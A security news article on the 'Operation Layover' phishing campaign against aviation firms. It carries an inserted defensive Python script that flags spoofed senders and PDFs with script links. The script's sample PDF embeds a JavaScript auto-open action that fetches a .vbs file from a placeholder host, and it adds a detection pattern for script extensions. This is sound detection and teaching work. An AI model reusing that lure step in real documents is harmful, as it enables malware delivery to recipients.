Trojan analysis led to the reveal of an attack on the aviation industry

Researchers unmasked a two-year-long attack dubbed Operation Layover: the research began with a tweet

Aviation industry targeted by a threat actor from Nigeria. The attack was flagged back in May, but the infection chain was active for at least two years.

A lengthy email phishing campaign aimed at the aviation sector has been revealed.[1] It all started in May, when the Microsoft Security Intelligence team tweeted about spear-phishing[2] attacks targeting the travel and aerospace industries and distributing RevengeRAT/AsyncRAT. Attackers based in Nigeria managed to run small-scale campaigns for extended periods while staying under the radar.

Cisco Talos researchers state that the attack emails focused on spreading off-the-shelf malware. The email campaigns were distributed around the world and affected companies connected with commercial aviation. The researchers also note that the actor has been running similar campaigns since at least 2013, and that the aviation industry has been a target for at least two years.[3]

We believe the actor is based out of Nigeria with a high degree of confidence and doesn't seem to be technically sophisticated, using off-the-shelf malware since the beginning of its activities without developing its own malware. The actor also buys the crypters that allow the usage of such malware without being detected. Throughout the years it has used several different crypters, mostly bought on online forums.

Email spoofing made the messages appear to come from legitimate organizations in the same industries as the targets. The attached PDF files contained embedded links leading to malicious VBScript, which dropped trojan payloads on the machine. The malware then ran its data exfiltration routines to obtain credit card details and credentials, take screenshots, and spy on users via their webcams.[4]
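The infection chain above combines two things a mail gateway can check statically: a sender whose visible From domain does not match the envelope sender, and a PDF attachment carrying link annotations or script actions. The script below is an added example written for this article, not code from 2-spyware, Microsoft or Cisco Talos; the email, the PDF bytes and all domain names in it are constructed, and the scoring weights are an assumption of the example, not anything the article states. It parses a raw message, compares the header From and Return-Path domains, and runs cheap regex checks on each PDF attachment for /URI links that point at script files, /JavaScript actions and an /OpenAction entry (auto-run on open).

```python
"""Triage an email with a PDF attachment for spoofed-sender and
embedded-link/script indicators. Added example, not code from the article."""
import email
import re
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

# Constructed sample PDF (not a real lure): one link annotation pointing at a
# .vbs file plus a JavaScript OpenAction, the pattern the article describes.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [5 0 R] >> endobj\n"
    b"4 0 obj << /S /JavaScript /JS (app.launchURL('http://example.invalid/doc.vbs')) >> endobj\n"
    b"5 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (http://example.invalid/doc.vbs) >> >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# File extensions that should never be the target of a link inside a business document.
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|hta|wsf|exe|scr|bat|ps1)(\?|#|$)", re.I)


def extract_pdf_indicators(pdf: bytes) -> dict:
    """Static checks on raw PDF bytes: link URIs, JavaScript, auto-run actions.
    Plain regex is enough for uncompressed objects; a production scanner would
    also inflate FlateDecode streams, which this example deliberately skips."""
    uris = [m.decode("latin-1") for m in re.findall(rb"/URI\s*\(([^)]*)\)", pdf)]
    return {
        "uris": uris,
        "script_uris": [u for u in uris if SCRIPT_EXT.search(u)],
        "has_javascript": bool(re.search(rb"/S\s*/JavaScript|/JS\b", pdf)),
        "has_open_action": b"/OpenAction" in pdf,
    }


def domain_of(header_value) -> str:
    """Lower-cased domain part of an address header, or '' if none."""
    addr = parseaddr(str(header_value or ""))[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def triage_message(raw: bytes) -> dict:
    """Return sender domains, every URI found in PDF attachments, a list of
    human-readable findings and an additive risk score (weights are assumed)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    from_domain = domain_of(msg["From"])
    envelope_domain = domain_of(msg["Return-Path"])
    findings, pdf_uris, score = [], [], 0
    if from_domain and envelope_domain and from_domain != envelope_domain:
        findings.append(f"header From domain {from_domain} differs from envelope sender {envelope_domain}")
        score += 2
    for part in msg.iter_attachments():
        if part.get_content_type() != "application/pdf":
            continue
        name = part.get_filename() or "unnamed.pdf"
        ind = extract_pdf_indicators(part.get_payload(decode=True))
        pdf_uris.extend(ind["uris"])
        for u in ind["script_uris"]:
            findings.append(f"{name}: link to script file {u}")
            score += 3
        if ind["has_javascript"]:
            findings.append(f"{name}: contains JavaScript action")
            score += 2
        if ind["has_open_action"]:
            findings.append(f"{name}: OpenAction runs automatically on open")
            score += 1
    return {"from_domain": from_domain, "envelope_domain": envelope_domain,
            "pdf_uris": pdf_uris, "findings": findings, "score": score}


def build_sample_email() -> bytes:
    """Constructed lure: the visible From claims a peer airline while the
    envelope sender is an unrelated mailer. Return-Path is normally stamped by
    the receiving MTA; it is set here only so the sample is self-contained."""
    msg = EmailMessage()
    msg["From"] = "Operations <ops@airline-example.invalid>"
    msg["Return-Path"] = "<bounce@unrelated-mailer.invalid>"
    msg["To"] = "fleet@target-example.invalid"
    msg["Subject"] = "Updated flight schedule"
    msg.set_content("Please review the attached schedule.")
    msg.add_attachment(SAMPLE_PDF, maintype="application", subtype="pdf", filename="schedule.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    result = triage_message(build_sample_email())
    for finding in result["findings"]:
        print("-", finding)
    print("score:", result["score"])
```

On the constructed sample the script reports the From/Return-Path mismatch, the link to a .vbs file, the JavaScript action and the OpenAction. The domain comparison is only a first-pass heuristic (legitimate bulk mailers also produce mismatches), so in practice it belongs alongside SPF, DKIM and DMARC results rather than replacing them.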

The particular Nigerian threat actor was investigated further

The attack focused on stealing cookies and login information, which, as is now known, ended up in the hands of a threat actor based in Nigeria. Such credentials can be sold on to more technically advanced criminals after the initial espionage, so the data exfiltration itself would be a minor issue compared to the attacks that can follow, such as ransomware and business email compromise. Harvesting sensitive data about organizations can pay off handsomely, since many buyers are willing to pay large sums for such information.

Valid credentials are valuable, so it is no surprise that criminals are driven by the possible financial gains. Researchers profiled the financially motivated attacker using DNS telemetry and by analyzing IP addresses and domains. The majority of the linked domains pointed to Nigerian locations. The analysis revealed an email address, a Telegram handle, and other user accounts, such as Skype, associated with the criminal. Based on these details, other campaigns dating back to 2013 were linked to the "akconsult" keyword and the same user accounts.

With the help of other researchers, the full identity of this attacker was revealed through social media. According to the researchers, the longer such a person operates, the more fingerprints get left behind. Every attack and all the findings can be stored and used to profile the attacker and establish links in the future.[5]

Little technical knowledge does not stop criminals

The attackers used various techniques and remote access trojans such as Agent Tesla[6] in this attack, aiming at data exfiltration. Despite being relatively new to the field and lacking sophistication, the attackers managed to operate these tools successfully and steal valuable information. Given the right conditions, such espionage campaigns can pose a huge risk to corporations.

In this case, we have shown that what seemed like a simple campaign is, in fact, a continuous operation that has been active for three years, targeting an entire industry.

Unfortunately, the travel industry is always an attractive target for such attackers because of the tempting profit. Countries tend to nationalize airlines in order to keep their internal operations data. However, the most valuable information relates to schedules and the particular travel patterns linked to individuals. Details like these are useful to the operator who first exfiltrates them and make criminals richer when the information is breached or sold.

About the author
Gabriel E. Hall

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.
